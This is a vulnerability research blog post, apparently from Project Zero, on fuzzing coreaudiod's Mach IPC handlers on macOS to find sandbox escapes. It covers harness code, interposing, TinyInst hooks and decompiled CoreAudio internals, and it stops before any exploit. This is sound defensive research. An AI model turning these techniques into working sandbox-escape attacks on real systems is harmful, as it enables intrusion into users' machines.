    In this blog post, I’ll explore using Mach IPC messages as an attack vector to find and exploit sandbox escapes. I’ll detail how I used a custom fuzzing harness, dynamic instrumentation, and plenty of debugging/static analysis to identify a high-risk type confusion vulnerability in the coreaudiod system daemon. Along the way, I’ll discuss some of the difficulties and tradeoffs I encountered.

    Transparently, this was my first venture into the world of MacOS security research and building a custom fuzzing harness. I hope this post serves as a guide to those who wish to embark on similar research endeavors.

    I am open-sourcing the fuzzing harness I built, as well as several tools I wrote that were useful to me throughout this project. All of this can be found here: https://github.com/googleprojectzero/p0tools/tree/master/CoreAudioFuzz

    The Approach: Knowledge-Driven Fuzzing

    For this research project, I adopted a hybrid approach that combined fuzzing and manual reverse engineering, which I refer to as knowledge-driven fuzzing. This method, learned from my friend Ned Williamson, balances automation with targeted investigation. Fuzzing provided the means to quickly test a wide range of inputs and identify areas where the system’s behavior deviated from expectations. However, when the fuzzer’s code coverage plateaued or specific hurdles arose, manual analysis came into play, forcing me to dive deeper into the target’s inner workings.

    Knowledge-driven fuzzing offers two key advantages. First, the research process never stagnates, as the goal of improving the code coverage of the fuzzer is always present. Second, achieving this goal requires a deep understanding of the code you are fuzzing. By the time you begin triaging legitimate, security-relevant crashes, the reverse engineering process will have given you extensive knowledge of the codebase, enabling analysis of crashes from an informed perspective.

    The cycle I followed during this research is as follows:

    1. Identify an attack vector
    2. Choose a target
    3. Create a fuzzing harness
    4. Fuzz and produce crashes
    5. Analyze crashes and code coverage      
    6. Iterate on the fuzzing harness
    7. Repeat steps 4-6  

    Identify an Attack Vector

    Standard browser sandboxing limits code execution by restricting direct operating system access. Consequently, exploiting a browser vulnerability typically requires the use of a separate “sandbox escape” vulnerability.

    Since interprocess communication (IPC) mechanisms allow two processes to communicate with each other, they can naturally serve as a bridge from a sandboxed process to an unrestricted one. This makes them a prime attack vector for sandbox escapes, as shown below.

    [Diagram: in a sandbox escape, a sandbox-restricted web browser process communicates with a message handler via Mach IPC; in privilege escalation, an unprivileged process communicates with a highly privileged message handler via Mach IPC.]

    I chose Mach messages, the lowest-level IPC component in the MacOS operating system, as the attack vector for this research, mostly out of a desire to understand MacOS IPC mechanisms at their most fundamental level, and because of Mach messages' track record of historical security issues.

    Previous Work and Background

    Leveraging Mach messages in exploit chains is far from a novel idea. For example, Ian Beer identified a core design issue in 2016 with the XNU kernel related to the handling of task_t Mach ports, which allowed for exploitation via Mach messages. Another post showed how an in-the-wild exploit chain utilized Mach messages in 2019 for heap grooming techniques. I also drew much inspiration from Ret2 Systems’ blog post about leveraging Mach message handlers to find and weaponize a Safari sandbox escape.

    I won’t spend too much time detailing the ins and outs of how Mach messages work, (that is better left to a more comprehensive post on the subject) but here’s a brief overview of Mach IPC for this blog post:

    1. Mach messages are stored within kernel-managed message queues, represented by a Mach port
    2. A process can fetch a message from a given port if it holds the receive right for that port
    3. A process can send a message to a given port if it holds a send right to that port

    MacOS applications can register a service with the bootstrap server, a special Mach port to which all processes hold a send right by default. This allows other processes to send a Mach message to the bootstrap server inquiring about a specific service, and the bootstrap server can respond with a send right to that service’s Mach port. MacOS system daemons register Mach services via launchd. You can view their .plist files within the /System/Library/LaunchAgents and /System/Library/LaunchDaemons directories to get an idea of the services registered. For example, the .plist file below highlights a Mach service registered for the Address Book application on MacOS using the identifier com.apple.AddressBook.AssistantService.

    <?xml version="1.0" encoding="UTF-8"?>

    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">

    <plist version="1.0">

    <dict>

            <key>POSIXSpawnType</key>

            <string>Adaptive</string>

            <key>Label</key>

            <string>com.apple.AddressBook.AssistantService</string>

            <key>MachServices</key>

            <dict>

                    <key>com.apple.AddressBook.AssistantService</key>

                    <true/>

            </dict>

            <key>ProgramArguments</key>

            <array>

                    <string>/System/Library/Frameworks/AddressBook.framework/Versions/A/Helpers/ABAssistantService.app/Contents/MacOS/ABAssistantService</string>

            </array>

    </dict>

    </plist>

    Choose a Target

    After deciding I wanted to research Mach services, the next question was which service to target. In order for a sandboxed process to send Mach messages to a service, it has to be explicitly allowed. If the process is using Apple’s App Sandbox feature, this is done within a .sb file, written using the TinyScheme format. The snippet below shows an excerpt of the sandbox file for a WebKit GPU Process. The allow mach-lookup directive is used to allow a sandboxed process to lookup and send Mach messages to a service.

    # File: /System/Volumes/Preboot/Cryptexes/Incoming/OS/System/Library/Frameworks/WebKit.framework/Versions/A/Resources/com.apple.WebKit.GPUProcess.sb

    (with-filter (system-attribute apple-internal)

        (allow mach-lookup

            (global-name "com.apple.analyticsd")

            (global-name "com.apple.diagnosticd")))

    (allow mach-lookup

           (global-name "com.apple.audio.audiohald")

           (global-name "com.apple.CARenderServer")

           (global-name "com.apple.fonts")

           (global-name "com.apple.PowerManagement.control")

           (global-name "com.apple.trustd.agent")

           (global-name "com.apple.logd.events"))

    This helped me narrow my focus significantly, from all MacOS processes down to processes with a sandbox-accessible Mach service:

    A Venn diagram illustrating process types on macOS. The outermost, largest oval represents All MacOS Processes. Within it, a smaller oval represents Processes with a Mach Service. The innermost, smallest oval represents Processes with a Sandbox Allowed Mach Service, indicating a subset of processes with increasing restrictions and specific Mach service permissions.

    In addition to inspecting the sandbox profiles, I used Jonathan Levin’s sbtool utility to test which Mach services could be interacted with for a given process. The tool (which was a bit outdated, but I was able to get it to compile) uses the builtin sandbox_check function under the hood to provide a nice list of accessible Mach service identifiers:

    $ ./sbtool 2813 mach

    com.apple.logd

    com.apple.xpc.smd

    com.apple.remoted

    com.apple.metadata.mds

    com.apple.coreduetd

    com.apple.apsd

    com.apple.coreservices.launchservicesd

    com.apple.bsd.dirhelper

    com.apple.logind

    com.apple.revision

    …Truncated…

    Ultimately, I chose to take a look at the coreaudiod daemon, and specifically the com.apple.audio.audiohald service for the following reasons:

    • It is a complex process
    • It allows Mach communications from several impactful applications, including the Safari GPU process
    • The Mach service had a large number of message handlers
    • The service seemed to allow control and modification of audio hardware, which would likely require elevated privileges
    • The coreaudiod binary and the CoreAudio Framework it heavily uses were both closed source, which would provide a unique reverse engineering challenge

    Create a Fuzzing Harness

    Once I chose an attack vector and target, the next step was to create a fuzzing harness capable of sending input through the attack vector (a Mach message) at a proper location within the target.

    A coverage-guided fuzzer is a powerful weapon, but only if its energy is focused in the right place—like a magnifying glass concentrating sunlight to start a fire. Without proper focus, the energy dissipates, achieving little impact.

    Determining an Entry Point

    Ideally, a fuzzer should perfectly replicate the environment and capabilities available to a potential attacker. However, this isn't always practical. Trade-offs often need to be made, such as accepting a higher rate of false positives for increased performance, simplified instrumentation, or ease of development. Therefore, identifying the “right place” to fuzz is highly dependent on the specific target and research goals.

    Option 1: Interprocess Fuzzing

    All Mach messages are sent and received using the mach_msg API, as shown below. Therefore, I thought the most intuitive way to fuzz coreaudiod’s Mach message handlers would be to write a fuzzing harness that called the mach_msg API and allowed my fuzzer to modify the message contents to produce crashes. The approach would look something like this:

    A diagram showing inter-process communication. A "SENDING PROCESS" calls mach_msg API, sending a message via "Mach IPC" to a "Kernel-Managed Message Queue". This queue then forwards the message via "Mach IPC" to a "Mach Message Handler" in the "RECEIVING PROCESS".

    However, this approach had a large downside: since we were sending IPC messages, the fuzzing harness would be in a different process space than the target. This meant code coverage information would need to be shared across a process boundary, which is not supported by most fuzzing tools. Additionally, kernel message queue processing adds a significant performance overhead.

    Option 2: Direct Harness

    While requiring a bit more work up front, another option was to write a fuzzing harness that directly loaded and called the Mach message handlers of interest. This would have the massive advantage of putting our fuzzer and instrumentation in the same process as the message handlers, allowing us to more easily obtain code coverage.

    A diagram illustrating a SINGLE PROCESS communication. It shows Load Library & Call Message Handler communicating via a Fuzzing Harness to a Mach Message Handler all within the same process.

    One notable downside of this fuzzing approach is that it assumes all fuzzer-generated inputs pass the kernel’s Mach message validation layer, which in a real system occurs before a message handler gets called. As we’ll see later, this is not always the case. In my view, however, the pros of fuzzing in the same process space (speed and easy code coverage collection) outweighed the cons of a potential increase in false positives.

    The approach would be as follows:

    1. Identify a suitable function for processing incoming mach messages
    2. Write a fuzzing harness to load the message handling code from coreaudiod 
    3. Use a fuzzer to generate inputs and call the fuzzing harness
    4. Profit, hopefully

    Finding the Mach Message Handler

    To start, I searched for the Mach service identifier, com.apple.audio.audiohald, but found no references to it within the coreaudiod binary. Next, I checked the libraries it loaded using otool. Logically, the CoreAudio framework seemed like a good candidate for housing the code for our message handler.

    $ otool -L /usr/sbin/coreaudiod

    /usr/sbin/coreaudiod:

            /System/Library/PrivateFrameworks/caulk.framework/Versions/A/caulk (compatibility version 1.0.0, current version 1.0.0)

            /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio (compatibility version 1.0.0, current version 1.0.0)

            /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation (compatibility version 150.0.0, current version 2602.0.255)

            /usr/lib/libAudioStatistics.dylib (compatibility version 1.0.0, current version 1.0.0, weak)

            /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation (compatibility version 300.0.0, current version 2602.0.255)

            /usr/lib/libobjc.A.dylib (compatibility version 1.0.0, current version 228.0.0)

            /usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 1700.255.5)

            /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1345.120.2)

    However, I was surprised to find that the path returned by otool did not exist!

    $ stat /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio

    stat: /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio: stat: No such file or directory

    The Dyld Shared Cache

    A bit of research showed me that as of MacOS Big Sur, most framework binaries are not stored on disk but within the dyld shared cache, a mechanism for pre-linking libraries to allow applications to run faster. Thankfully, IDA Pro, Binary Ninja, and Ghidra support parsing the dyld shared cache to obtain the libraries stored within. I also used this helpful tool to successfully extract libraries for additional analysis.

    Once I had the CoreAudio Framework within IDA, I quickly found a call to bootstrap_check_in with the service identifier passed as an argument, proving the CoreAudio framework binary was responsible for setting up the Mach service I wanted to fuzz. However, it still wasn’t obvious where the message handling code was happening, despite quite a bit of reverse engineering.

    A screenshot of disassembled code. A function macOS_PlatformBehaviors::get_system_port is shown. A call to _bootstrap_check_in is highlighted, along with the string com.apple.audio.audiohald being passed as a service name.

    It turns out this is due to the use of the Mach Interface Generator (MIG), an Interface Definition Language from Apple that makes it easier to write RPC clients and servers by abstracting away much of the Mach layer. When compiled, MIG message handling code gets bundled into a structure called a subsystem. One can easily grep for these subsystems to find their offsets:

    $ nm -m ./System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio | grep -i subsystem

                     (undefined) external _CACentralStateDumpRegisterSubsystem (from AudioToolboxCore)

    00007ff840470138 (__DATA_CONST,__const) non-external _HALC_HALB_MIGClient_subsystem

    00007ff840470270 (__DATA_CONST,__const) non-external _HALS_HALB_MIGServer_subsystem

    Next, I searched in IDA for cross-references to the _HALS_HALB_MIGServer_subsystem symbol, which identified the MIG server function that parsed incoming Mach messages! The routine is shown below, with the first parameter (the rdi register) being the incoming Mach message and the second (the rsi register) being the message to return to the client. The MIG server function extracted the msgh_id parameter from the Mach message and used that to index into the MIG subsystem. Then, the necessary function handler was called.

    A flowchart of disassembled code within HALB_MIGServer_server. Annotations highlight "Incoming msg rdi" and steps to "Get msg ID" and "Get subsystem offset". This offset is then used to "Index into function handler based on msg ID", leading to a "Call function" block.

    I further confirmed this by setting an LLDB breakpoint on the coreaudiod process (after disabling SIP) for the _HALB_MIGServer_server function. Then, I adjusted the volume on my system, and the breakpoint was hit:

    A debugger lldb window showing a breakpoint hit in CoreAudio_HALB_MIGServer_server. The process is stopped at the beginning of this function, with the instruction push rbp highlighted. The thread information indicates the queue is com.apple.audio.device.BuiltInSpeakerDevice.event

    In this example, tracing the message handler called from the MIG subsystem showed the _XObject_HasProperty function was called based on the Mach message’s msgh_id.

    A debugger lldb window showing two states of a stopped process. The first state shows the process stopped at a call rcx instruction within CoreAudio_HALB_MIGServer_server. After a step into si command, the second state shows the process stopped at the beginning of CoreAudio__XObject_HasProperty, as indicated by the red arrow and highlighted function name.

    Depending on the msgh_id, a few dozen message handlers were accessible from the MIG subsystem. They are easily identifiable by the convenient __X prefix to their function names added by MIG.

    A list of function names, likely from a software library or framework, related to object and system context management. Each function name is prefixed with an f icon and highlighted in red, possibly indicating they are of interest for analysis or have been patched. Examples include __XObject_PropertyListener, __XIOContext_PauseIO, __XSystem_CreateIOContext, and __XObject_HasProperty.

    The _HALB_MIGServer_server function struck a great balance: it sat close to the low-level message handling code, while its inputs still closely resembled those of a call to mach_msg. I decided this was the place to inject fuzz input.

    Creating a Basic Fuzzing Harness

    After identifying the function I wanted to fuzz, the next step was to write a program to read a file and deliver the file’s contents as input to the target function. This might have been as easy as linking the CoreAudio library with my fuzzing harness and calling the _HALB_MIGServer_server function, but unfortunately the function was not exported.

    Instead, I borrowed some logic from Ivan Fratric and his TinyInst tool (we’ll be talking about it a lot more later) which returns a provided symbol’s address from a library. The code parses the structure of Mach-O binaries, specifically their headers and load commands, to locate and extract symbol information. This made it possible to resolve and call the target function in my fuzzing harness, even when it wasn’t exported.

    So, the high level function of my harness was as follows:

    1. Load the CoreAudio Library
    2. Get a function pointer for the target function from the CoreAudio Library
    3. Read an input from a file
    4. Call the target function with the input

    The full implementation of my fuzzing harness can be found here. An example of invoking the harness to send a message from an input file is shown below:

    $ ./harness -f corpora/basic/1 -v

    *******NEW MESSAGE*******

    Message ID: 1010000 (XSystem_Open)

    ------ MACH MSG HEADER ------

    msg_bits: 2319532353

    msg_size: 56

    msg_remote_port: 1094795585

    msg_local_port: 1094795585

    msg_voucher_port: 1094795585

    msg_id: 1010000

    ------ MACH MSG BODY (32 bytes) ------

    0x01 0x00 0x00 0x00 0x03 0x30 0x00 0x00 0x41 0x41 0x41 0x41 0x41 0x41 0x11 0x00 0x41 0x41 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

     

    ------ MACH MSG TRAILER ------

    msg_trailer_type: 0

    msg_trailer_size: 32

    msg_seqno: 0

    msg_sender: 0

    ------ MACH MSG TRAILER BODY (32 bytes) ------

    0xf5 0x01 0x00 0x00 0xf5 0x01 0x00 0x00 0x14 0x00 0x00 0x00 0xf5 0x01 0x00 0x00 0x14 0x00 0x00 0x00 0x7e 0x02 0x00 0x00 0xa3 0x86 0x01 0x00 0x4f 0x06 0x00 0x00 

    Processing function result: 1

    *******RETURN MESSAGE*******

    ------ MACH MSG HEADER ------

    msg_bits: 1

    msg_size: 36

    msg_remote_port: 1094795585

    msg_local_port: 0

    msg_voucher_port: 0

    msg_id: 1010100

    ------ MACH MSG BODY (12 bytes) ------

    0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00

    Harvesting Legitimate Mach Messages

    I now had a way to deliver data directly into the MIG subsystem (_HALB_MIGServer_server) I wanted to fuzz. However, I had no idea what message size, options, or data the handler was expecting. While a coverage-guided fuzzer will begin to uncover the proper message format over time, it is advantageous to obtain a seed corpus of legitimate inputs when first beginning to fuzz to improve efficiency.

    To do this, I used LLDB to set a breakpoint on the MIG subsystem and dump the first argument (containing the incoming Mach message). Then, I played around with the operating system to cause Mach messages to be sent to coreaudiod. The Audio MIDI Setup MacOS application ended up being great for this, as it allows one to create, edit, and delete audio devices.

    A screenshot of macOS Audio Devices settings. A red arrow points to the "+" button in the bottom left, with a dropdown menu open showing "Create Aggregate Device" highlighted, indicating the action being taken.
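A session along the following lines does the dumping (the breakpoint name comes from the earlier analysis; the 0x40 byte count is an arbitrary illustrative choice):

```
(lldb) breakpoint set --name _HALB_MIGServer_server
(lldb) breakpoint command add 1
Enter your debugger command(s).  Type 'DONE' to end.
> memory read --size 1 --count 0x40 $rdi
> continue
> DONE
```

Each time the breakpoint fires, the dumped bytes of the incoming message can be saved as a seed file for the corpus.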

    Fuzz and Produce Crashes

    Armed with a small seed corpus and an input delivery mechanism, the next step was to configure a fuzzer to use the created fuzzing harness and obtain code coverage. I used the excellent Jackalope fuzzer built and maintained by Ivan Fratric. I chose Jackalope primarily for its high level of customizability—it allows easy implementation of custom mutators, instrumentation, and sample delivery. Additionally, I appreciated its seamless usage on macOS, particularly its code coverage capabilities powered by TinyInst. In contrast, I tried and failed to collect code coverage using Frida against system daemons on macOS.

    I used the following command to start a Jackalope fuzzing run:

    $ jackalope -in in/ -out out/ -delivery file -instrument_module CoreAudio -target_module harness -target_method _fuzz -nargs 1 -iterations 1000 -persist -loop -dump_coverage -cmp_coverage -generate_unwind -nthreads 5 -- ./harness -f @@

    Iterate on the Fuzzing Harness

    This harness quickly generated many crashes, a sign I was on the right track. However, I soon learned that initial crashes are often not indicative of a security bug, but of a design flaw in the fuzzing harness itself or an invalid assumption.

    Iteration 1: Target Initialization

    One of the difficulties with my fuzzing approach was that my target function (the Mach message handler) expected the HAL system to be in a specific state to begin receiving Mach messages. By simply calling the library function with my fuzzing harness, these assumptions were broken.

    This caused errors to start popping up. As shown in the diagram below, the harness bypassed much of the bootstrapping functionality the coreaudiod process would normally take care of during startup.

    Two diagrams comparing code execution. The left diagram, labeled "Fuzzer + Harness," shows a single path 1 directly calling "Process Mach Message" within the "CoreAudio Library." The right diagram, labeled "Coreaudiod Native Process," shows multiple steps 1, 2, 3, ..., X before "Process Mach Message" is called in the "CoreAudio Library."

    Code coverage, as well as error messages, can be very helpful in determining the initialization steps a fuzzing harness is neglecting. For example, I noticed my data flow would always fail early in most Mach message handlers, logging the message Error: there is no system.

    A flowchart of disassembled code execution. One path, highlighted with "We always go this way!", leads to a successful HALS_System::GetInstance call. Another path shows an error message "Error: There is no system" after a call to HALS_Object_SetProperty if a different condition is met.

    It turns out I needed to initialize the HAL System before I could interact correctly with the Mach APIs. In my case, calling the _AudioHardwareStartServer function in my fuzzing harness took care of most of the necessary initialization.

    Iteration 2: API Call Chaining

    My first crack at a fuzzing harness was cool, but it made a pretty large assumption: all accessible Mach message handlers functioned independently of each other. As I quickly learned, this assumption was incorrect. As I ran the fuzzer, error messages like the following one started popping up:

    A terminal window showing log output from mach-send. A line is highlighted with a red box and arrow, pointing to the text "Plist: there is no client" associated with a coreaudiod error.

    The error seemed to indicate the SetPropertyData Mach handler was expecting a client to be registered via a previous Mach message. Clearly, the Mach handlers I was fuzzing were stateful and depended on each other to function properly. My fuzzing harness would need to take this into consideration in order to have any hope of obtaining good code coverage on the target.

    This highlights a common problem in the fuzzing world: most coverage-guided fuzzers accept a single input (a bunch of bytes), while many things we want to fuzz accept data in a completely different format, such as several arguments of different types, or even several function calls. This Google writeup explains the problem well, as does Ned Williamson’s OffensiveCon Talk from 2019.

    To get around this limitation, we can use a technique I refer to as API Call Chaining, which considers each fuzz input as a stream that can be read from to craft multiple valid inputs. Thus, each fuzzing iteration would be capable of generating multiple Mach messages. This simple but important insight allows a fuzzer to explore the interdependency of separate function calls using the same code-coverage informed input.

    The FuzzedDataProvider class, which is part of LibFuzzer but can be included as a header for use with any fuzzing harness, is a great choice for consuming a fuzz sample and transforming it into a more meaningful data type. Consider the following pseudocode:

    extern "C" int LLVMFuzzerTestOneInput(const uint8_t* data, size_t size) {

        FuzzedDataProvider fuzz_data(data, size); // Initialize FDP

        while (fuzz_data.remaining_bytes() >= MACH_MSG_MIN_SIZE) { // Continue until we've consumed all bytes

            uint32_t msg_id = fuzz_data.ConsumeIntegralInRange<uint32_t>(1010000, 1010062);

            switch (msg_id) {

                case 1010000: {

                    send_XSystem_Open_msg(fuzz_data);

                    break;

                }

                case 1010001: {

                    send_XSystem_Close_msg(fuzz_data);

                    break;

                }

                case 1010002: {

                    send_XSystem_GetObjectInfo_msg(fuzz_data);

                    break;

                }

                ... continued

            } 

        }

        return 0;

    }

    This code transforms a blob of bytes into a mechanism that can repeatedly call APIs with fuzz data in a deterministic manner. What’s more, a coverage-guided fuzzer will be able to explore and identify a series of API calls that improves code coverage. From the fuzzer’s perspective, it is simply modifying an array of bytes, blissfully unaware of the additional complexity happening under the hood.

    For example, my fuzzer quickly identified that most interactions with the audiohald service required a prior call to the _XSystem_Open message handler to register a client. The inputs the fuzzer saved to its corpus naturally reflected this fact over time.

    Iteration 3: Mocking Out Buggy/Unneeded Functionality

    Sometimes coverage plateaus, and a fuzzer struggles to explore new code paths. For example, say we’re fuzzing an HTTP server and it keeps getting stuck because it’s trying to read and parse configuration files on startup. If our focus was on the server’s request parsing and response logic, we might choose to mock out the functionality we don’t care about in order to focus the fuzzer’s code coverage exploration elsewhere.

    In my fuzzing harness’ case, calling the initialization routines was causing my harness to try to register the com.apple.audio.audiohald Mach service with the bootstrap server, which was throwing an error because it was already registered by launchd. Since my harness didn’t need to register the Mach service in order to inject messages (remember, our harness calls the MIG subsystem directly), I decided to mock out the functionality.

    When dealing with pure C functions, function interposing can be used to easily modify a function’s behavior. In the example below, I declare a new version of the bootstrap_check_in function that simply returns KERN_SUCCESS, effectively nopping it out while telling the caller that it was successful.

    #include <mach/mach.h>

    #include <stdarg.h>

    // Forward declaration for bootstrap_check_in

    kern_return_t bootstrap_check_in(mach_port_t bootstrap_port, const char *service_name, mach_port_t *service_port);

    // Custom implementation of bootstrap_check_in

    kern_return_t custom_bootstrap_check_in(mach_port_t bootstrap_port, const char *service_name, mach_port_t *service_port) {

        // Ensure service_port is non-null and set it to a non-zero value

        if (service_port) {

            *service_port = 1;  // Set to a non-zero value

        }

        return KERN_SUCCESS;  // Return 0 (KERN_SUCCESS)

    }

    // Interposing array for bootstrap_check_in

    __attribute__((used)) static struct {

        const void* replacement;

        const void* replacee;

    } interposers[] __attribute__((section("__DATA,__interpose"))) = {

        { (const void *)custom_bootstrap_check_in, (const void *)bootstrap_check_in }

    };

    In the case of C++ functions, I used TinyInst’s Hook API to modify problematic functionality. In one specific scenario, my fuzzer was crashing the target constantly because the CFRelease function was being called with a NULL pointer. Some further analysis told me that this was a non-security-relevant bug where a user’s input, which was assumed to contain a valid plist object, was not properly validated. If the plist object was invalid or NULL, a downstream function call would receive NULL, and an abort would occur.

    A flowchart of disassembled code for a function HALS_SettingsManager::_WriteSetting. Text annotations highlight "No Check for NULL Property List" before a call to _CFPropertyListCreateDeepCopy. Another annotation points to a jmp _CFRelease instruction, labeled "CFRelease", where the NULL pointer ultimately triggers an abort.

    So, I wrote the following TinyInst hook, which checked whether the plist object passed into the function was NULL. If so, my hook returned the function call early, bypassing the buggy code.

    void HALSWriteSettingHook::OnFunctionEntered() {

        printf("HALS_SettingsManager::_WriteSetting Entered\n");

        if (!GetRegister(RDX)) {

            printf("NULL plist passed as argument, returning to prevent NULL CFRelease\n");

            printf("Current $RSP: %p\n", GetRegister(RSP));

            void *return_address;

           

            RemoteRead((void*)GetRegister(RSP), &return_address, sizeof(void *));

            printf("Current return address: %p\n", GetReturnAddress());

            printf("Current $RIP: %p\n", GetRegister(RIP));

            SetRegister(RAX, 0);

            SetRegister(RIP, GetReturnAddress());

            printf("$RIP register is now: %p\n", GetRegister(ARCH_PC));

            SetRegister(RSP, GetRegister(RSP) + 8); // Simulate a ret instruction

            printf("$RSP is now: %p\n", GetRegister(RSP));

        }

    }

    Next, I modified Jackalope to apply my custom instrumentation via its CreateInstrumentation API. That way, my hook was applied during each fuzzing iteration, and the annoying NULL CFRelease calls stopped happening. The output below shows the hook preventing a crash from a NULL plist object passed to the troublesome API:

    Instrumented module CoreAudio, code size: 7516156

    Hooking function __ZN11HALS_System13_WriteSettingEP11HALS_ClientPK10__CFStringPKv in module CoreAudio

    HALS_SettingsManager::_WriteSetting Entered

    NULL plist passed as argument, returning to prevent NULL CFRelease

    Current $RSP: 0x7ff7bf83b358

    Current return address: 0x7ff8451e7430

    Current $RIP: 0x7ff84533a675

    $RIP register is now: 0x7ff8451e7430

    $RSP is now: 0x7ff7bf83b360

    Total execs: 6230

    Unique samples: 184 (0 discarded)

    Crashes: 3 (2 unique)

    Hangs: 0

    Offsets: 13550

    Execs/s: 134

    The code to reproduce and build this fuzzer with custom instrumentation can be found here: https://github.com/googleprojectzero/p0tools/tree/master/CoreAudioFuzz/jackalope-modifications

    Iteration 4: Improving Sample Structure

    The great thing about a fuzzing-centric auditing technique is that it highlights knowledge gaps in the code you are auditing. As you address these gaps, you gain a deeper understanding of the structure and constraints of the inputs that your fuzzing harness should generate. These insights enable you to refine your harness to produce more targeted inputs, effectively penetrating deeper code paths and improving overall code coverage. The following subsections highlight examples of how I identified and implemented opportunities to iterate on my fuzzing harness, significantly enhancing its efficiency and effectiveness.

    Message Handler Syntax Checks 

    Code coverage results from fuzzing runs are incredibly telling. I noticed that after running my fuzzer for a few days, it was having trouble exploring past the beginning of most of the Mach message handlers. One simple example is shown below (explored basic blocks are highlighted in blue), where several comparisons were not being passed, causing the function to error out early on. Here, the rdi register holds the incoming Mach message we sent to the handler.

    A flowchart of disassembled code for a function _XIOContext_SetClientControlPort. Several conditional branches are shown, labeled "Error Out", leading away from the main execution path. The "Rest of Functionality" block at the bottom includes a call to HALS_IOContext_SetClientControlPort.

    The comparisons were checking that the Mach message was well formatted, with a message length set to 0x34 and various options set within the message. If it wasn’t, it was discarded.

    With this in mind, I modified my fuzzing harness to set the fields in the Mach messages I sent to the _XIOContext_SetClientControlPort handler such that they passed these conditions. The fuzzer could modify other pieces of the message as it pleased, but since these aspects needed to conform to strict guidelines, I simply hardcoded them.

    These small modifications were the beginning of an input structure I was building for my target. The efficiency of my fuzzing improved astronomically after adding these guidelines to the fuzzer - my code coverage increased by 2000% shortly thereafter.

    Out-of-Line (OOL) Message Data

    I noticed my fuzzing setup started generating tons of crashes from a call to mig_deallocate, which frees a given address. At first, I thought I had found an interesting bug, since I could control the address passed to mig_deallocate.

    I quickly learned, however, that Mach messages can contain various types of Out-of-line (OOL) data. This allows a client to allocate a memory region and place a pointer to it within the Mach message, which will be processed and, in some cases, freed by the message handler. When sending a Mach message with the mach_msg API, the XNU kernel will validate that the memory pointed to by OOL descriptors is properly owned and accessible by the client process.

    I hadn’t found a vulnerability; my fuzzing harness was simply attached to the target at a point downstream which bypassed the normal memory checks that would have been performed by the kernel. To remedy this, I modified my fuzzing harness to support allocating space for OOL data and passing the valid memory address within the Mach messages I fuzzed.

    The Vulnerability

    After many fuzzing harness iterations, lldb “next instruction” commands, and hours spent overheating my MacBook Pro, I had finally begun to acquire an understanding of the CoreAudio framework and generate some meaningful crashes.

    But first, some background knowledge.

    The Hardware Abstraction Layer (HAL)

    The com.apple.audio.audiohald Mach service exposes an interface known as the Hardware Abstraction Layer (HAL). The HAL allows clients to interact with audio devices, plugins, and settings on the operating system, represented in the coreaudiod process as C++ objects of type HALS_Object.

    In order to interact with the HAL, a client must first register itself. There are a few ways to do this, but the simplest is using the _XSystem_Open Mach API. Calling this API will invoke the HALS_System::AddClient method, which uses the Mach message’s audit token to create a client (clnt) HALS_Object to map subsequent requests to that client. The code block below shows an IDA decompilation snippet of the creation of a clnt object.

    v85[0] = v5 != 0;
    v28 = v83[0];
    v29 = 'clnt';
    HALS_Object::HALS_Object((HALS_Object *)v13, 'clnt', 0, (__int64)v83[0], v30);
    *(_QWORD *)v13 = &unk_7FF850E56640;
    *(_OWORD *)(v13 + 72) = 0LL;
    *(_OWORD *)(v13 + 88) = 0LL;
    *(_DWORD *)(v13 + 104) = 1065353216;

    Stepping into the HALS_Object constructor, we can see that a mutex is acquired, the next available object ID is fetched, and a call is made to HALS_ObjectMap::MapObject.

    void __fastcall HALS_Object::HALS_Object(HALS_Object *this, _BOOL4 a2, unsigned int a3, __int64 a4, HALS_Object *a5)
    {
      unsigned int v5; // r12d
      HALB_Mutex::Locker *v6; // r15
      unsigned int v7; // ebx
      HALS_Object *v8; // rdx
      int v9; // eax

      v5 = a3;
      *(_QWORD *)this = &unk_7FF850E7C200;
      *((_DWORD *)this + 2) = 0;
      *((_DWORD *)this + 3) = HALB_MachPort::CreatePort(0LL, a2, a3);
      *((_WORD *)this + 8) = 257;
      *((_WORD *)this + 10) = 1;
      pthread_once(&HALS_ObjectMap::sObjectInfoListInitialized, HALS_ObjectMap::Initialize);
      v6 = HALS_ObjectMap::sObjectInfoListMutex;
      HALB_Mutex::Lock(HALS_ObjectMap::sObjectInfoListMutex);
      v7 = (unsigned int)HALS_ObjectMap::sNextObjectID;
      LODWORD(HALS_ObjectMap::sNextObjectID) = (_DWORD)HALS_ObjectMap::sNextObjectID + 1;
      HALB_Mutex::Locker::~Locker(v6);
      *((_DWORD *)this + 6) = v7;
      *((_DWORD *)this + 7) = a2;
      if ( !v5 )
        v5 = a2;
      *((_DWORD *)this + 8) = v5;
      if ( a4 )
        v9 = *(_DWORD *)(a4 + 24);
      else
        v9 = 0;
      *((_DWORD *)this + 9) = v9;
      *((_QWORD *)this + 5) = &stru_7FF850E86420;
      *((_BYTE *)this + 48) = 0;
      *((_DWORD *)this + 13) = 0;
      HALS_ObjectMap::MapObject((HALS_ObjectMap *)v7, (__int64)this, v8);
    }

    The HALS_ObjectMap::MapObject function adds the freshly allocated object to a linked list stored on the heap. I wrote a program using the TinyInst Hook API that iterates through each object in the list and dumps its raw contents:

    A terminal window displaying output from a command likely related to debugging or instrumenting CoreAudio. It shows messages like "Instrumented module CoreAudio", "OnModuleInstrumented: Looks like we made it", and an "OBJECT DUMP" section with memory addresses and hexadecimal/ASCII data.

    To modify an existing HALS_Object, most of the HAL Mach message handlers use the HALS_ObjectMap::CopyObjectByObjectID function, which accepts an integer ID (parsed from the Mach message’s body) for a given HALS_Object, which it then looks up in the Object Map and returns a pointer to the object.

    For example, here’s a small snippet of the ​_XSystem_GetObjectInfo Mach message handler, which calls the HALS_ObjectMap::CopyObjectByObjectID function before accessing information about the object and returning it.

    HALS_Client::EvaluateSandboxAllowsMicAccess(v5);
